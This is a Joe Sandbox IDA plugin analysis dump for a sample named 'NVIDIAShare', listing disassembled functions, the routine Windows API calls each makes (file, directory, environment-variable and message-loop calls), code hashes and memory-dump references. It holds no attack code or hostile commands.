Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction ID: fdef43b3eb64f9e5ee46f2791b8f376966dc1bd59d8439ba5046b73dfb4533c0
Opcode Fuzzy Hash: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction Fuzzy Hash: 57F0E232701268BAEA3056289C09FDB7AACAB42B00F080451FA84E71C8D769D94586F5

Function 0101AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

OleInitialize.OLE32(00000000), ref: 0101AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
SHGetMalloc.SHELL32(01048438), ref: 0101AC70

Strings

3Qo, xrefs: 0101AC47
riched20.dll, xrefs: 0101AC1E

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction ID: de0c2c066df0be36b2813305af08cdc1cff539e17a37911c3627e3cde9ae58f5
Opcode Fuzzy Hash: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction Fuzzy Hash: 90F012B1D0020AABDB10AFA9D8489DFFFFCFF94700F00415AE895E6205DBB856458FA1

Function 010098E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,01007760,?,00000005,?,00000011), ref: 0100995F
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,01007760,?,00000005,?), ref: 010099A2
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099F9

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
Instruction ID: 222b96d065fb82373c182a2d9a11c53edd2b75b0e7c213ac18208096a4d53eee
Opcode Fuzzy Hash: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
Instruction Fuzzy Hash: 0F31F3305447466FF7329B2CCD85BDABBD8BB44324F100B19FAE9961C2D7A9A484CB91

Function 0101B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
TranslateMessage.USER32(?), ref: 0101B5AC
DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction ID: 1633354f7ded88808f9f7caf4b745224206bf1a6314bb01919f5ab00f27dd280
Opcode Fuzzy Hash: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction Fuzzy Hash: 2AF0BD71A0111ABB9B309BE59D5CEDB7FBCEE052917004415F549D6018EB3DD109CBF0

Function 0101DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

Strings

sfxcmd, xrefs: 0101DBEF
sfxpar, xrefs: 0101DC2B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction ID: 9cb1007f255d773dcb693c674015889c190e70ac8f314e663e60cf7efa3ee115
Opcode Fuzzy Hash: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction Fuzzy Hash: 6BF0ECB240422AB7DB212FD9CC49AFB3BACBF14781B040855BDC59901DE7BC8480D7B0

Function 01009785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01009795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 010097AD
GetLastError.KERNEL32 ref: 010097DF
GetLastError.KERNEL32 ref: 010097FE

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction ID: 96ad69860a02c9ad5b6ecdd5c7c81921caf53b7ec2ea1dd63a076b0d0c50013a
Opcode Fuzzy Hash: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction Fuzzy Hash: C011C231900204EBFF734E29C84466D77ECFB40328F108669F5DE852C2D7798A44CB61

Function 0102AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0100D710,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue), ref: 0102AD66
GetLastError.KERNEL32(?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000,00000364,?,010298B7), ref: 0102AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000), ref: 0102AD80

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction ID: 0751f8038fa6d3f97cf8c9002dd80e6159192b0d3865aa8b6ace89b4c9ebaa40
Opcode Fuzzy Hash: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction Fuzzy Hash: BE01D436701236EBC772596C9C84A5B7B9CAF056A37110620F987D7545DB2AD401C7E0

Function 01009F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0100D343,00000001,?,?,?,00000000,0101551D,?,?,?), ref: 01009F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0101551D,?,?,?,?,?,01014FC7,?), ref: 01009FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0100D343,00000001,?,?), ref: 0100A011

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction ID: 493a91900ea6ba7a0376d952b5b7f2b7dbb6d2942c63b486677dcdc525178ea5
Opcode Fuzzy Hash: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction Fuzzy Hash: FF31DF71208309EFEB16CE24D858BBEB7A9FB80715F04051CF9C55B2D1C776A948CBA2

Function 0100A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0100C27E: _wcslen.LIBCMT ref: 0100C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A30C
GetLastError.KERNEL32(?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A329

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction ID: 2753721b89d16633d4da004b44c93eea8ea069dc90c5e05c833055b3f4a33166
Opcode Fuzzy Hash: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction Fuzzy Hash: BC019235700324EAFF63AA794849BED7788AF09680F048494FAC1D70C4D698D58187A5

Function 0102B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B8B8

Strings

, xrefs: 0102B8FD

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
Instruction ID: 8f3a7bf5e30a118955fe2a2897e48e7c3e210e6cfc639311d24a4aca95e09aab
Opcode Fuzzy Hash: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
Instruction Fuzzy Hash: 7C41E6716042AC9EDB228E688C84BFABBF9EB55304F1408EDD5DA87142D275AA45CF60

Function 0102AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0102AFDD

Strings

LCMapStringEx, xrefs: 0102AF7D, 0102AF87

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
Instruction ID: fc26a525c943a906db5dc6c05d9e3b3fbff72a473449783ad4b3c627160805c6
Opcode Fuzzy Hash: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
Instruction Fuzzy Hash: 4101D37260021AFBCF129F91DC05DEE7FA6FB48750F014259FE546A160CA3A8931EB90

Function 0102AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0102A56F), ref: 0102AF55

Strings

InitializeCriticalSectionEx, xrefs: 0102AF1B, 0102AF25

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
Instruction ID: 0cd4227ebb1f8c79556e1aa949217fd28dea33b59e134ef13fec1096ed568925
Opcode Fuzzy Hash: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
Instruction Fuzzy Hash: 48F0BE7164521DFBCB125F55CC01CAEBFA9EF48B11B4142AAFD889B210DE364A10AB85

Function 0102ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0102ADEE

Strings

FlsAlloc, xrefs: 0102ADC0, 0102ADCA

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
Instruction ID: 3a21702ad11497728db6cb2e0387121dbf0560affef3f07ab36b39d74d4d022f
Opcode Fuzzy Hash: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
Instruction Fuzzy Hash: 0FE02B7174122DBBD711AB6ADC02D6EBB9CEB54721B01029EFC869F300CD755E0187D5

Function 0101EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101EAF9

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Strings

3Qo, xrefs: 0101EAE7, 0101EAF3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction ID: 6a392caec40f87ad32311ed5acac0c46c4695ec0245888cf11c8964c0505cc9c
Opcode Fuzzy Hash: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction Fuzzy Hash: CAB012C729A0437C30056201DE01C3F010CE6D1D90320C01FFCC8DC044DC853C060471

Function 0102BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102BA89,?,00000000), ref: 0102BC64
GetCPInfo.KERNEL32(00000000,0102BA89,?,?,?,0102BA89,?,00000000), ref: 0102BC77

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
Instruction ID: dc26fb32cbd1b25910bc1b75880fbe1b411f7fc4dd38961313886e2f0b740b56
Opcode Fuzzy Hash: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
Instruction Fuzzy Hash: 4251557090026A9FEB21EF39C4806FABFF5EF11300F2844AEC5D68B251EA399545CB91

Function 01009A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,01009A50,?,?,00000000,?,?,01008CBC,?), ref: 01009BAB
GetLastError.KERNEL32(?,00000000,01008411,-00009570,00000000,000007F3), ref: 01009BB6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction ID: 7557fd9c4df2f93c6a0fc0a5dc7a825324d032f683c303b97ce969a12a1e8d67
Opcode Fuzzy Hash: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction Fuzzy Hash: 9841E030504B018FFB26CF18C6845AABBE9FBD4338F44896DE8D9832D2D774A8448B91

Function 0102BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
